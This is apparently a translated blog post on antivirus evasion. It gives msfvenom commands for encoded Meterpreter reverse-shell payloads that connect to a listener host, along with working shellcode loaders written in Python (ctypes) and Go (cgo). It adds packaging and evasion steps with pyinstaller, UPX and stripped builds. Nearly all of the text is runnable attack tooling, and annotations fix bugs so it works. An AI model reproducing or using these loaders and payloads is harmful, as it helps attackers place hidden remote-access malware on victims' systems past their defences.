• Payload separation for AV evasion


    shellcode loader
    Use a third-party loader that reads the raw shellcode from a separate file and maps it into memory at run time, so the loader binary itself contains no payload bytes for a signature to match.

    https://github.com/clinicallyinane/shellcode_launcher

    msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.1.130 lport=4444 -e x86/shikata_ga_nai -i 5 -f raw > test.c

    (The original command paired the windows/x64 payload with the x86/shikata_ga_nai encoder; encoder and payload architecture must match, and the loader must be the same bitness as the shellcode, so the x86 payload used in the rest of the post is shown here. The .c extension is just a file name: -f raw writes the bare shellcode bytes.)
    

    Run on the target:

    shellcode_launcher.exe -i test.c
    

    The msf listener receives the session as usual.
    csc and InstallUtil
    Not repeated here; see the white-plus-black (trusted binary loading attacker code) section above.
    Less common languages
    Strictly speaking these are not obscure languages. The point is that the resulting executable is a bundled interpreter or Go runtime whose PE layout is not what the AV's signatures are matching on, and the payload is only assembled in memory at run time. Two are covered here.

    pyinstaller
    Python version of the shellcode template:

    #! /usr/bin/env python
    # encoding:utf-8

    import ctypes

    def execute():
        # Bind shell. Paste the msfvenom -f py output here; the b"" prefix and
        # the \x escapes are required (the post's copy had lost the backslashes).
        shellcode = bytearray(
            b"\xbe\x24\x6e\x0c\x71\xda\xc8\xd9\x74\x24\xf4\x5b\x29"
            # ...
            b"\x37\xa5\x48\xea\x47\xf6\x81\x90\x07\xc6\x62\x9a\x56"
            b"\x13"
        )

        kernel32 = ctypes.windll.kernel32
        # Declare prototypes so the returned pointer is not truncated to a
        # 32-bit int; the original c_int casts break on 64-bit Python.
        kernel32.VirtualAlloc.restype = ctypes.c_void_p
        kernel32.VirtualAlloc.argtypes = [ctypes.c_void_p, ctypes.c_size_t,
                                          ctypes.c_uint32, ctypes.c_uint32]
        kernel32.RtlMoveMemory.argtypes = [ctypes.c_void_p, ctypes.c_void_p,
                                           ctypes.c_size_t]
        kernel32.CreateThread.restype = ctypes.c_void_p
        kernel32.CreateThread.argtypes = [ctypes.c_void_p, ctypes.c_size_t,
                                          ctypes.c_void_p, ctypes.c_void_p,
                                          ctypes.c_uint32, ctypes.c_void_p]
        kernel32.WaitForSingleObject.argtypes = [ctypes.c_void_p, ctypes.c_uint32]

        # MEM_COMMIT | MEM_RESERVE (0x3000), PAGE_EXECUTE_READWRITE (0x40)
        ptr = kernel32.VirtualAlloc(None, len(shellcode), 0x3000, 0x40)

        buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)

        kernel32.RtlMoveMemory(ptr, buf, len(shellcode))

        # Run the shellcode on a new thread and block until it returns.
        ht = kernel32.CreateThread(None, 0, ptr, None, 0, None)

        kernel32.WaitForSingleObject(ht, 0xFFFFFFFF)  # INFINITE

    if __name__ == "__main__":
        execute()
    
    msfvenom -p windows/meterpreter/reverse_tcp LPORT=4444 LHOST=172.16.1.130 -e x86/shikata_ga_nai -i 5 -f py -o  1.py
    

    The -f py output is only the buf definition, not a runnable script: paste those lines into the shellcode = bytearray(...) slot of the template above, then package the result with pyinstaller. Use a Python build whose bitness matches the payload (32-bit Python for the x86 payload generated above).

    pyinstaller.py -F --console 1.py
    

    py2exe works the same way as pyinstaller and is not covered separately.

    go+upx
    package main

    /*
    #include <windows.h>
    #include <string.h>

    // The post calls C.call() but never shows its definition; this is the
    // usual cgo preamble for it (assumed here): map RWX memory, copy the
    // shellcode in and jump to it.
    void call(char *code, int len) {
        void *mem = VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        memcpy(mem, code, len);
        ((void (*)())mem)();
    }
    */
    import "C"
    import "unsafe"

    func main() {
        buf := ""
        buf += "\xdd\xc6\xd9\x74\x24\xf4\x5f\x33\xc9\xb8\xb3\x5e\x2c"
        // ...elided...
        buf += "\xc9\xb1\x97\x31\x47\x1a\x03\x47\x1a\x83\xc7\x04\xe2"
        // At the call site, hand the shellcode straight to the C function by
        // converting it to a pointer of the right type; the length is passed
        // explicitly because the bytes are not NUL-terminated.
        shellcode := []byte(buf)
        C.call((*C.char)(unsafe.Pointer(&shellcode[0])), C.int(len(shellcode)))
    }
    

    A plain build is large, so compile with go build -ldflags="-s -w" (strips the symbol table and DWARF debug info); go build -ldflags="-H windowsgui -s -w" additionally hides the console window. Because the loader goes through cgo, a C toolchain is required: build on Windows with mingw-w64 gcc installed, or cross-compile from Linux with CGO_ENABLED=1 GOOS=windows CC=x86_64-w64-mingw32-gcc GOARCH=amd64 go build -ldflags="-s -w" (use GOARCH=386 and i686-w64-mingw32-gcc for an x86 payload; GOARCH must match the shellcode's architecture).

    The resulting exe is a little over 900 KB; compressing it with UPX brings it down to roughly 200 KB, and the session still comes back normally. Note that UPX-packed binaries are themselves a common heuristic trigger, so check the packed file against the target AV before relying on it.

  • Original post: https://www.cnblogs.com/nul1/p/12167561.html
Copyright © 2020-2023  润新知